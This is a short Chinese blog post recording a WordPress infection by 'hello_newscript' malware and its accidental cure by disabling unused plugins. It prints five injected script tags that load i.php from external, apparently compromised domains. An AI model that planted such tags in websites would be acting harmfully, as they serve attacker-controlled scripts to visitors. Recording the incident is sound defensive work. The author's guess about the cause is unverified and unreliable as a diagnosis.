今天遇到一个关于WordPress的网站被恶意软件攻击的问题。该恶意软件在网站的头部插入了多条来自不同源的i.php请求,所有的请求ID均以“hello_newscript”开头。
<script type=’text/javascript’ src=’https://longtailmagic.com/domain/i.php?ver=5.6.2′ id=’hello_newscript0-js’></script>
<script type=’text/javascript’ src=’https://jadsupport.com/includes/i.php?ver=5.6.2′ id=’hello_newscript1-js’></script>
<script type=’text/javascript’ src=’https://magaliefonteneau.com/wp-content/i.php?ver=5.6.2′ id=’hello_newscript2-js’></script>
<script type=’text/javascript’ src=’http://futuracp.com/images/i.php?ver=5.6.2′ id=’hello_newscript3-js’></script>
<script type=’text/javascript’ src=’http://casualwoodcreations.com/images/i.php?ver=5.6.2′ id=’hello_newscript4-js’></script>
客户反馈称网站加载速度较慢,通过查看网页源代码,我发现了上述无法加载的JavaScript文件。
经过分析,这些代码是恶意插入的。值得庆幸的是,这几个感染源的服务器中,有些已经关闭,而其他的在国内访问时速度也较慢,因此虽然网站速度受到影响,但暂未出现更严重的后果。
关于这次感染的具体原因,我没有深入调查,但通过禁用了一些未使用的插件后,问题便消失了。可以推测,这些未启用的插件可能是感染的源头。
撰写此文,旨在记录这一经历,希望你不会遇到类似的情况。
本站资源来源于网络,仅限用于学习和研究目的,请勿用于其他用途。如有侵权请发送邮件至vizenaujmaslak9@hotmail.com删除。:FGJ博客 » WordPress遇到hello_newscript病毒,意外恢复正常
